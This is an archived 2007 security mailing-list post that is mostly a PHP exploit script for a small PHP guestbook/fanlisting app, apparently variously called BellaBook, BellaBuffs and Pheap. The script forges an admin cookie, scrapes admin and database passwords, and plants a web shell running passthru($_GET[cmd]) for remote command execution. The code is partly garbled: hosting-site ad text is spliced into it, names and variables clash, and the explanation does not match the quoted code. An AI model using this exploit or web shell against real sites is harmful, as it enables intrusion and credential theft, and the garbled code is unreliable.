Hosting Provided By

BellaBook Admin Bypass/Remote Code Execution

From: <ilkerkandemir(at)mynet.com>
Date: Tue Jul 31 2007 - 06:44:20 EDT

<?php

#AUTHOR: ilker kandemir

#DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBuffs.zip

Explanation:

The user verification routine used in most of the files is:

########################################################
#require_once('prefs.php');
#if (isset($_COOKIE['bellabuffs'])) {
# if ($_COOKIE['bellabuffs'] == md5($admin_name.$admin_pass.$secret)) {
# if (isset($_GET['ap'])) { $page = $_GET['ap']; } else { $page = ""; }
# include('header.php');
#
########################################################

So basically it's saying "If the value within the cookie pheap_login is not the same value that is assigned to the $admin_name variable withing prefs.php then you have to be redirected to the login page".

Do you need help?

So if we know the $admin_name we can access any page that uses this authentication method. Also, we can retrieve all credentials in clear-text.

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

if ($argc<5) {

print "-------------------------------------------------------------------------\r\n";
print "              BellaBook Admin Bypass/Remote Code Execution\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: pheap.php [OPTION] [HOST] [PATH] [USER] ([COMMAND])\r\n\r\n";
print "[OPTION]  = 0 = Credentials Disclosures\r\n";
print "            1 = Remote Code Execution\r\n";
print "[HOST]       = Target server's hostname or ip address\r\n";
print "[PATH]       = Path where Pheap is located\r\n";
print "[USER]       = Admin's username\r\n";
print "[COMMAND] = Command to execute\r\n\r\n";
print "e.g.             pheap.php 0 victim.com /pheap/ admin\r\n";
print "                  pheap.php 1 victim.com /pheap/ admin \"ls -lia\"\r\n";
print "-------------------------------------------------------------------------\r\n";

die;
}

// Props to [rgod] for the following functions

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;   if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);     if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;     }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);     if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";     $ock=fsockopen($parts[0],$parts[1]);     if (!$ock) {
      echo 'No response from proxy...';die;     }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {       $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

function make_seed()
{

list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); }

$exploit = $argv[1];
$host = $argv[2];
$path = $argv[3];
$user = $argv[4];
$cmd  = $argv[5];
$cmd  = urlencode($cmd);
$port=80;$proxy="";

Do you need more help?

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($exploit==0){

print "-------------------------------------------------------------------------\r\n";
print "              BellaBuffs Admin Bypass/Remote Code Execution      \r\n";
print "-------------------------------------------------------------------------\r\n";

    $packet ="GET " . $path . "captcha.php HTTP/1.1\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (strstr($html,"This is the settings panel")){} else{echo "...Failed!\r\n"; exit();}

    $temp=explode("name=\"user_name\" class=\"ieleft\" value=\"",$html);
    $temp2=explode("\" /> :Username",$temp[1]);
    $ret_user=$temp2[0];

echo "[+] Admin User: " . $admin_name . "\r\n";

    $temp=explode("name=\"password\" class=\"ieleft\" value=\"",$html);
    $temp2=explode("\" /> :Password",$temp[1]);
    $ret_user=$temp2[0];
Can we help you? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek

echo "[+] Admin Pass: " . $admin_pass . "\r\n";

    $temp=explode("name=\"dbhost\" class=\"ieleft\" id=\"dbhost\" value=\"",$html);
    $temp2=explode("\" /> :Database Host",$temp[1]);
    $ret_user=$temp2[0];

echo "[+] Database Host: " . $admin_name . "\r\n";

    $temp=explode("name=\"dbuser\" class=\"ieleft\" id=\"dbuser\" value=\"",$html);
    $temp2=explode("\" /> :Database Username",$temp[1]);
    $ret_user=$temp2[0];

echo "[+] Database User: " . $admin_pass . "\r\n";

    $temp=explode("name=\"dbpass\" class=\"ieleft\" id=\"dbpass\" value=\"",$html);
    $temp2=explode("\" /> :Database Password",$temp[1]);
    $ret_user=$temp2[0];

Can't find what you're looking for?

echo "[+] Database Pass: " . $ret_user . "\r\n";

print "-------------------------------------------------------------------------\r\n";
print "                     MEFISTO BEGiNS                                 \r\n";
print "-------------------------------------------------------------------------\r\n";

}
if($exploit==1){
$packet ="GET " . $path . "admin.php?ap=manage_members&=" . $path . "index.php HTTP/1.1\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
$temp=explode("name=\"filename\" value=\"",$html); $temp2=explode("\">",$temp[1]); $fullpath=$temp2[0]; $shell = 'For Turkey";ini_set("max_execution_time",0);passthru($_GET[cmd]);echo "Milw0rm.Com";?>'; $data = "mce_editor_0_styleSelect="; $data .= "&mce_editor_0_formatSelect="; $data .= "&mce_editor_0_fontNameSelect="; $data .= "&mce_editor_0_fontSizeSelect=0"; $data .= "&mce_editor_0_zoomSelect=100%25"; $data .= "&content=" . urlencode($shell); $data .= "&filename=" . urlencode($fullpath);
    $data .= "&update_text.x=57";
    $data .= "&update_text.y=15";
$packet ="POST " . $path . "admin.php?ap=manage_members HTTP/1.1\r\n";
Don't know where to look next?
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:
Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq

certification

focus-bsd

focus-ids

focus-ih

focus-linux

focus-ms

focus-sun

focus-unix-other

focus-virus

forensics

incidents

libnet

linux-secnews

ms-secnews

pen-test

secpapers

secprog

sectools

secureshell

security-basics

securityjobs

sf-news

vuln-dev

webappsec
Request more information about Pantek
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept: */*\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Referer: http://" . $host.$path . "admin.php?ap=manage_members&=" . $path . "index.php\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data;

    sendpacketii($packet);
$packet ="GET " . $path . "index.php?cmd=" . $cmd . " HTTP/1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    if (strstr($html,"...Silentz"))
     {
print "-------------------------------------------------------------------------\r\n"; print " BellaBuffs Admin Bypass/Remote Code Execution \r\n"; print "-------------------------------------------------------------------------\r\n"; $temp=explode("...Silentz",$html); $temp2=explode("",$temp[1]); echo "===============================================================\r\n\r\n"; echo $temp2[0]; echo "\r\n===============================================================\r\n"; echo "\r\n[+] Shell...http://" .$host.$path. "index.php?cmd=[COMMAND]\r\n" }

}
?> Received on Tue Jul 31 11:33:11 2007

This message: [ Message body ]
Next message: scott-REMOVE(at)vbulletin.com: "Re: RFI ====> vBulletin v3.6.5"
Previous message: rPath Update Announcements: "rPSA-2007-0151-1 gvim vim vim-minimal"
Next in thread: jem(at)jemjabella.co.uk: "Re: BellaBook Admin Bypass/Remote Code Execution"
Maybe reply: jem(at)jemjabella.co.uk: "Re: BellaBook Admin Bypass/Remote Code Execution"
Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:33 EDT